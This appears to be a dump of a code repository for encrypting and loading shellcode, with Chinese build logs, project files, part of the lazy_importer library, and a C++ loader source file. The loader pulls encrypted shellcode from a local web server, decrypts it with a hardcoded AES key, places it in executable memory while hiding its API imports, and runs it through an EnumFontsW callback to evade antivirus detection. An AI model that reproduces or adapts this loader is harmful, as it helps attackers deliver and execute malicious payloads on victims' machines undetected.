3 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(66,11): warning C4804: “<=”: 在操作中使用类型“bool”不安全
4 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(69,30): warning C4018: “>=”: 有符号/无符号不匹配
5 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(112,20): warning C4018: “<”: 有符号/无符号不匹配
6 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(131,20): warning C4018: “<”: 有符号/无符号不匹配
7 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(124,9): warning C4101: “processHandle”: 未引用的局部变量
8 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(125,9): warning C4101: “remoteThread”: 未引用的局部变量
9 | E:\Source Code\C_code\shellcode加密\aes加密\encrypt_shellcode.cpp(126,8): warning C4101: “remoteBuffer”: 未引用的局部变量
10 | aes加密.vcxproj -> E:\Source Code\C_code\shellcode加密\Debug\aes加密.exe
11 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\Debug\aes加密.exe" "E:\vcpkg\installed\x86-windows\debug\bin" "Debug\aes加密.tlog\aes加密.write.1u.tlog" "Debug\vcpkg.applocal.log"
12 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.obj
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x86-windows:
2 | Debug|Win32|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/Debug/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/Debug/encrypt_shellcode.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/encrypt_shellcode.obj
--------------------------------------------------------------------------------
/aes加密/Debug/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/vc143.idb
--------------------------------------------------------------------------------
/aes加密/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Debug/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/Release/AES.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/AES.obj
--------------------------------------------------------------------------------
/aes加密/Release/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/Base64.obj
--------------------------------------------------------------------------------
/aes加密/Release/Shellcode_AesEncrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/Shellcode_AesEncrypt.obj
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\aes加密\release\test.obj
3 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.obj
4 | e:\source code\c_code\shellcode加密\release\aes加密.exe
5 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.ipdb
6 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.iobj
7 | e:\source code\c_code\shellcode加密\release\aes加密.pdb
8 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\cl.command.1.tlog
9 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\cl.read.1.tlog
10 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\cl.write.1.tlog
11 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\link.command.1.tlog
12 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\link.read.1.tlog
13 | e:\source code\c_code\shellcode加密\aes加密\release\aes加密.tlog\link.write.1.tlog
14 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\Release\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | AES.cpp
3 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1058,45): warning C4018: “<”: 有符号/无符号不匹配
4 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1069,45): warning C4018: “<”: 有符号/无符号不匹配
5 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1080,45): warning C4018: “<”: 有符号/无符号不匹配
6 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1101,45): warning C4018: “<”: 有符号/无符号不匹配
7 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1112,45): warning C4018: “<”: 有符号/无符号不匹配
8 | E:\Source Code\C_code\shellcode加密\aes加密\AES.cpp(1124,45): warning C4018: “<”: 有符号/无符号不匹配
9 | Base64.cpp
10 | E:\Source Code\C_code\shellcode加密\aes加密\Base64.cpp(69,57): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
11 | E:\Source Code\C_code\shellcode加密\aes加密\Base64.cpp(86,56): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
12 | Shellcode_AesDecrypt.cpp
13 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(15,1): warning C4326: “main”的返回类型应为“int”而非“void”
14 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(25,20): warning C4018: “<”: 有符号/无符号不匹配
15 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(33,13): warning C4477: “sscanf”: 格式字符串“%02x”需要类型“unsigned int *”的参数,但可变参数 1 拥有了类型“unsigned char *”
16 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(33,13): message : 请考虑在格式字符串中使用“%hhx”
17 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(40,20): warning C4018: “<”: 有符号/无符号不匹配
18 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(534,48): error C2664: “LPVOID (LPVOID,SIZE_T,DWORD,DWORD)”: 无法将参数 1 从“_Ty”转换为“LPVOID”
19 | with
20 | [
21 | _Ty=int
22 | ]
23 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(534,48): message : 从整型类型转换为指针类型需要 reinterpret_cast、C 样式转换或带圆括号的函数样式强制转换
24 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(55,98): message : 查看对正在编译的函数 模板 实例化“decltype(auto) li::detail::lazy_function<52974849,LPVOID (__stdcall *)(LPVOID,SIZE_T,DWORD,DWORD)>::operator ()(int &&,unsigned int &&,int &&,int &&) const”的引用
25 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(532): error C3169: “decltype(auto)”: 无法从“LPVOID”推断“auto”的类型
26 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesDecrypt.cpp(55,19): error C3779: “li::detail::lazy_function<52974849,LPVOID (__stdcall *)(LPVOID,SIZE_T,DWORD,DWORD)>::operator ()”: 要使用将会返回“decltype(auto)”的函数,必须首先定义此函数
27 | E:\Source Code\C_code\shellcode加密\aes加密\lazy_importer.hpp(531,54): message : 参见“li::detail::lazy_function<52974849,LPVOID (__stdcall *)(LPVOID,SIZE_T,DWORD,DWORD)>::operator ()”的声明
28 | lazy_importer.cpp
29 | Shellcode_AesEncrypt.cpp
30 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(51,12): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
31 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x86-windows:
2 | Release|Win32|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/aes加密.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/aes加密/Release/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/Release/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Release/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/Shellcode_AesDecrypt.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_DEPRECATE
2 | #include
3 | #include "lazy_importer.hpp"
4 | #define BUF_SIZE 4096
5 | #include
6 | #include "Shellcode加密库.h"
7 |
8 | using namespace std;
9 | char g_key[17] = "/TXlwa6H5,,$vV$0"; //填写key密钥
10 | char g_iv[17] = "uiP1St&thydHGkC]"; //定义iv向量
11 |
12 | void main(int argc, char* argv[])
13 | {
14 | // 加密后的shellcode
15 | string buf = "Zq3ejgFVl/qtP/dqcQidBN6BKWTiL/KZZpfW+Iy8ZMnaA4Au2oEHMltr8TihG9yvvQ1MDt0PFqboWsF5ka9y72L9xJ5a4HRBFspK3vMwvtKMH8Xtko6ErmfUUB8pv4n4DybjQseeuYtPqEDGvX8zlwONk9nyu5r8aozfNCxLvnbFyzX5OLInbra87Az3FGhilZnCwMufIPZLgolhRkgyhnS96CsMst/pNz4AqcCNmfe7Gw1rcuVgHqETNxwIsNzWDmUguUJ173NHAZJpKmF1k39IYnF4JMvVk3QH81jzX68ClhGvADXnPlmz20PHzzjKOzkovpW4cPT3Q/1B2HOwWwhKPZdLKakJeuSa1YLwv6Nu3UdP8II6dGDVsgb4y/U7O1aiHbJFXSM5XXx7eKqTe8MV8gLfwNNR6M4qaWEm7XmdsE0WryhL5F1SFe/6uxPrcIFnGE3I0jVntLjYfVWotkkrEgL7M6rXlOgKHF3Pd6AIIPm23zULA9NyJsHuKmqOUgyzf7LiPxPcIqhNo5DA1opqCqBS3XTeusUjr6x3AyBT9MquUeJKuB7BBtWJWyuQzTzzSXaDRmErc6lSTM+DKTo101TZYKz4Jl2I8xDMey7IJT+Z1iYt/thgi1FeRLnrGAFKhNn3xAqjYORcKXLPGkSWq1MoZZxOJi6QF1uqMlB3tDBD6w/pAhuqHR+ZxnaHjfbqybG8rNLXc6hshmazoiFakC9QwHM9RgyVde9GGpkNr+wzjp1Tc1SbXSHtFHXumU1IP6NvLqU0/tWrTui9t8nrsqNFgGlQUXyAzmnk04vXJeD7kxGbSFSXwffPGUlOtDS1q/+P+fwj+ZvjpmiPLzoo+hgZ0UOtyO1ThltWr4rWitqMPneleC11qlVcyOp0odOTxuZiUeJyTOY9wHWwXg3snVWat23VSE7eQ4QWcF/GtfRVBsiGGENo1hH1nuxNTlEx/2os30f3IOj/yUfIXpuwHaWsNwlyw6119Z3PgCOdR+1qDCvJenZEsCkyjUJ830xC1V5VxCw1m0btTP+LaefsNEocc5V7fyNyaw0o72yl/g+bacycAbG/hIJlWbaXneDFysBLPtLFJjXm0gAsE3iyffdB9l6c8ffohInaNlWC8x7IDb4X6vrFC8cncDFb3NKIInVFR6bmqXfxXAamxzKXdpVjngPZg6YCWpTUtobZhThnhpO1KZxvHoFCcidxLq+mifWHpcldcS/ez2vWGdriSbd6i9FGGaxQQvHze1HmaLP/sj34JDMfIVfOI2/4sejnjluKfhcu5I0P76idHJKMDHr+rJBtpSxX3jc+UNlfeFmhjuN2Yy/TO1kLRfUdfAeZP2Vz4WhITdRf8bvqJA==";
16 |
17 | unsigned char bufs[4096] = { 0 };
18 | char url[MAX_PATH] = { "http://127.0.0.1:8000/shellcode.txt" };
19 | GetInterNetURLText(url, bufs);
20 | string buf((char*)bufs);
21 |
22 | // 解密shellcode
23 | string strbuf = DecryptionAES(buf, g_key, (char*)g_iv);
24 |
25 | //将解密的shellcode放到shellcode数组中
26 | char* p = (char*)strbuf.c_str();
27 | unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));
28 | for (size_t i = 0; i < strbuf.length() / 2; i++) {
29 | sscanf(p, "%02x", &shellcode[i]);
30 | p += 2;
31 | }
32 |
33 | //输出shellcode数组里的内容
34 | int ShellcodeSize = strbuf.length() / 2;
35 | printf("Decrypted buffer:\n");
36 | for (int i = 0; i < ShellcodeSize; i++) {
37 | printf("\\x%02x", shellcode[i]);
38 | }
39 |
40 | //加载shellcode
41 | char* orig_buffer;
42 | orig_buffer = (char*)LI_FN(VirtualAlloc)(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
43 |
44 | RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
45 |
46 | //使用EnumUILanguages函数执行解密后的shellcode
47 | //EnumUILanguages((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
48 |
49 | //使用EnumFontsW回调函数加载shellcode
50 | EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
51 | }
--------------------------------------------------------------------------------
/aes加密/Shellcode_AesEncrypt.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/Shellcode_AesEncrypt.cpp
--------------------------------------------------------------------------------
/aes加密/aes加密.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 | true
27 | true
28 |
29 |
30 | false
31 | false
32 |
33 |
34 | false
35 | false
36 |
37 |
38 |
39 |
40 | {b4dc16ff-79c8-4c66-be29-8528b628b876}
41 |
42 |
43 |
44 | 16.0
45 | Win32Proj
46 | {734881f0-b88d-41e3-b9c2-a48a8e0772d4}
47 | aes加密
48 | 10.0
49 |
50 |
51 |
52 | Application
53 | true
54 | v143
55 | Unicode
56 |
57 |
58 | Application
59 | false
60 | v143
61 | true
62 | Unicode
63 |
64 |
65 | Application
66 | true
67 | v143
68 | Unicode
69 |
70 |
71 | Application
72 | false
73 | v143
74 | true
75 | Unicode
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 | $(LibraryPath)
98 |
99 |
100 | $(LibraryPath)
101 |
102 |
103 |
104 | Level3
105 | true
106 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
107 | true
108 | false
109 |
110 |
111 | Console
112 | true
113 |
114 |
115 |
116 |
117 | Level3
118 | true
119 | true
120 | true
121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
122 | true
123 | false
124 |
125 |
126 | Console
127 | true
128 | true
129 | true
130 |
131 |
132 |
133 |
134 | Level3
135 | true
136 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
137 | true
138 | false
139 | E:\Source Code\C_code\shellcode加密\Shellcode加密库;%(AdditionalIncludeDirectories)
140 |
141 |
142 | Console
143 | true
144 |
145 |
146 |
147 |
148 | Level3
149 | true
150 | true
151 | true
152 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
153 | true
154 | false
155 | E:\Source Code\C_code\shellcode加密\Shellcode加密库;%(AdditionalIncludeDirectories)
156 |
157 |
158 | Console
159 | true
160 | true
161 | true
162 |
163 |
164 |
165 |
166 |
167 |
168 |
--------------------------------------------------------------------------------
/aes加密/aes加密.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 头文件
20 |
21 |
22 |
23 |
24 | 源文件
25 |
26 |
27 | 源文件
28 |
29 |
30 | 源文件
31 |
32 |
33 |
--------------------------------------------------------------------------------
/aes加密/aes加密.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/aes加密/lazy_importer.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018-2020 Justas Masiulis
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | // documentation is available at https://github.com/JustasMasiulis/lazy_importer
18 |
19 | #ifndef LAZY_IMPORTER_HPP
20 | #define LAZY_IMPORTER_HPP
21 |
22 | #define LI_FN(name) \
23 | ::li::detail::lazy_function<::li::detail::khash(#name), decltype(&name)>()
24 |
25 | #define LI_FN_DEF(name) ::li::detail::lazy_function<::li::detail::khash(#name), name>()
26 |
27 | #define LI_MODULE(name) ::li::detail::lazy_module<::li::detail::khash(name)>()
28 |
29 | // NOTE only std::forward is used from this header.
30 | // If there is a need to eliminate this dependency the function itself is very small.
31 |
32 | #include
33 | #include
34 | #include
35 |
36 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE
37 | #if defined(_MSC_VER)
38 | #define LAZY_IMPORTER_FORCEINLINE __forceinline
39 | #elif defined(__GNUC__) && __GNUC__ > 3
40 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__))
41 | #else
42 | #define LAZY_IMPORTER_FORCEINLINE inline
43 | #endif
44 | #else
45 | #define LAZY_IMPORTER_FORCEINLINE inline
46 | #endif
47 |
48 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE
49 | #define LAZY_IMPORTER_TOLOWER(c) (c >= 'A' && c <= 'Z' ? (c | (1 << 5)) : c)
50 | #else
51 | #define LAZY_IMPORTER_TOLOWER(c) (c)
52 | #endif
53 |
54 | namespace li { namespace detail {
55 |
56 | template
57 | struct pair {
58 | First first;
59 | Second second;
60 | };
61 |
62 | namespace win {
63 |
64 | struct LIST_ENTRY_T {
65 | const char* Flink;
66 | const char* Blink;
67 | };
68 |
69 | struct UNICODE_STRING_T {
70 | unsigned short Length;
71 | unsigned short MaximumLength;
72 | wchar_t* Buffer;
73 | };
74 |
75 | struct PEB_LDR_DATA_T {
76 | unsigned long Length;
77 | unsigned long Initialized;
78 | const char* SsHandle;
79 | LIST_ENTRY_T InLoadOrderModuleList;
80 | };
81 |
82 | struct PEB_T {
83 | unsigned char Reserved1[2];
84 | unsigned char BeingDebugged;
85 | unsigned char Reserved2[1];
86 | const char* Reserved3[2];
87 | PEB_LDR_DATA_T* Ldr;
88 | };
89 |
90 | struct LDR_DATA_TABLE_ENTRY_T {
91 | LIST_ENTRY_T InLoadOrderLinks;
92 | LIST_ENTRY_T InMemoryOrderLinks;
93 | LIST_ENTRY_T InInitializationOrderLinks;
94 | const char* DllBase;
95 | const char* EntryPoint;
96 | union {
97 | unsigned long SizeOfImage;
98 | const char* _dummy;
99 | };
100 | UNICODE_STRING_T FullDllName;
101 | UNICODE_STRING_T BaseDllName;
102 |
103 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T*
104 | load_order_next() const noexcept
105 | {
106 | return reinterpret_cast(
107 | InLoadOrderLinks.Flink);
108 | }
109 | };
110 |
111 | struct IMAGE_DOS_HEADER { // DOS .EXE header
112 | unsigned short e_magic; // Magic number
113 | unsigned short e_cblp; // Bytes on last page of file
114 | unsigned short e_cp; // Pages in file
115 | unsigned short e_crlc; // Relocations
116 | unsigned short e_cparhdr; // Size of header in paragraphs
117 | unsigned short e_minalloc; // Minimum extra paragraphs needed
118 | unsigned short e_maxalloc; // Maximum extra paragraphs needed
119 | unsigned short e_ss; // Initial (relative) SS value
120 | unsigned short e_sp; // Initial SP value
121 | unsigned short e_csum; // Checksum
122 | unsigned short e_ip; // Initial IP value
123 | unsigned short e_cs; // Initial (relative) CS value
124 | unsigned short e_lfarlc; // File address of relocation table
125 | unsigned short e_ovno; // Overlay number
126 | unsigned short e_res[4]; // Reserved words
127 | unsigned short e_oemid; // OEM identifier (for e_oeminfo)
128 | unsigned short e_oeminfo; // OEM information; e_oemid specific
129 | unsigned short e_res2[10]; // Reserved words
130 | long e_lfanew; // File address of new exe header
131 | };
132 |
133 | struct IMAGE_FILE_HEADER {
134 | unsigned short Machine;
135 | unsigned short NumberOfSections;
136 | unsigned long TimeDateStamp;
137 | unsigned long PointerToSymbolTable;
138 | unsigned long NumberOfSymbols;
139 | unsigned short SizeOfOptionalHeader;
140 | unsigned short Characteristics;
141 | };
142 |
143 | struct IMAGE_EXPORT_DIRECTORY {
144 | unsigned long Characteristics;
145 | unsigned long TimeDateStamp;
146 | unsigned short MajorVersion;
147 | unsigned short MinorVersion;
148 | unsigned long Name;
149 | unsigned long Base;
150 | unsigned long NumberOfFunctions;
151 | unsigned long NumberOfNames;
152 | unsigned long AddressOfFunctions; // RVA from base of image
153 | unsigned long AddressOfNames; // RVA from base of image
154 | unsigned long AddressOfNameOrdinals; // RVA from base of image
155 | };
156 |
157 | struct IMAGE_DATA_DIRECTORY {
158 | unsigned long VirtualAddress;
159 | unsigned long Size;
160 | };
161 |
162 | struct IMAGE_OPTIONAL_HEADER64 {
163 | unsigned short Magic;
164 | unsigned char MajorLinkerVersion;
165 | unsigned char MinorLinkerVersion;
166 | unsigned long SizeOfCode;
167 | unsigned long SizeOfInitializedData;
168 | unsigned long SizeOfUninitializedData;
169 | unsigned long AddressOfEntryPoint;
170 | unsigned long BaseOfCode;
171 | unsigned long long ImageBase;
172 | unsigned long SectionAlignment;
173 | unsigned long FileAlignment;
174 | unsigned short MajorOperatingSystemVersion;
175 | unsigned short MinorOperatingSystemVersion;
176 | unsigned short MajorImageVersion;
177 | unsigned short MinorImageVersion;
178 | unsigned short MajorSubsystemVersion;
179 | unsigned short MinorSubsystemVersion;
180 | unsigned long Win32VersionValue;
181 | unsigned long SizeOfImage;
182 | unsigned long SizeOfHeaders;
183 | unsigned long CheckSum;
184 | unsigned short Subsystem;
185 | unsigned short DllCharacteristics;
186 | unsigned long long SizeOfStackReserve;
187 | unsigned long long SizeOfStackCommit;
188 | unsigned long long SizeOfHeapReserve;
189 | unsigned long long SizeOfHeapCommit;
190 | unsigned long LoaderFlags;
191 | unsigned long NumberOfRvaAndSizes;
192 | IMAGE_DATA_DIRECTORY DataDirectory[16];
193 | };
194 |
195 | struct IMAGE_OPTIONAL_HEADER32 {
196 | unsigned short Magic;
197 | unsigned char MajorLinkerVersion;
198 | unsigned char MinorLinkerVersion;
199 | unsigned long SizeOfCode;
200 | unsigned long SizeOfInitializedData;
201 | unsigned long SizeOfUninitializedData;
202 | unsigned long AddressOfEntryPoint;
203 | unsigned long BaseOfCode;
204 | unsigned long BaseOfData;
205 | unsigned long ImageBase;
206 | unsigned long SectionAlignment;
207 | unsigned long FileAlignment;
208 | unsigned short MajorOperatingSystemVersion;
209 | unsigned short MinorOperatingSystemVersion;
210 | unsigned short MajorImageVersion;
211 | unsigned short MinorImageVersion;
212 | unsigned short MajorSubsystemVersion;
213 | unsigned short MinorSubsystemVersion;
214 | unsigned long Win32VersionValue;
215 | unsigned long SizeOfImage;
216 | unsigned long SizeOfHeaders;
217 | unsigned long CheckSum;
218 | unsigned short Subsystem;
219 | unsigned short DllCharacteristics;
220 | unsigned long SizeOfStackReserve;
221 | unsigned long SizeOfStackCommit;
222 | unsigned long SizeOfHeapReserve;
223 | unsigned long SizeOfHeapCommit;
224 | unsigned long LoaderFlags;
225 | unsigned long NumberOfRvaAndSizes;
226 | IMAGE_DATA_DIRECTORY DataDirectory[16];
227 | };
228 |
229 | struct IMAGE_NT_HEADERS {
230 | unsigned long Signature;
231 | IMAGE_FILE_HEADER FileHeader;
232 | #ifdef _WIN64
233 | IMAGE_OPTIONAL_HEADER64 OptionalHeader;
234 | #else
235 | IMAGE_OPTIONAL_HEADER32 OptionalHeader;
236 | #endif
237 | };
238 |
239 | } // namespace win
240 |
241 | // hashing stuff
242 | struct hash_t {
243 | using value_type = unsigned long;
244 | constexpr static value_type offset = 2166136261;
245 | constexpr static value_type prime = 16777619;
246 | constexpr static unsigned long long prime64 = prime;
247 |
248 | LAZY_IMPORTER_FORCEINLINE constexpr static value_type single(value_type value,
249 | char c) noexcept
250 | {
251 | return static_cast(
252 | (value ^ LAZY_IMPORTER_TOLOWER(c)) *
253 | static_cast(prime));
254 | }
255 | };
256 |
257 | template
258 | LAZY_IMPORTER_FORCEINLINE constexpr hash_t::value_type
259 | khash(const CharT* str, hash_t::value_type value = hash_t::offset) noexcept
260 | {
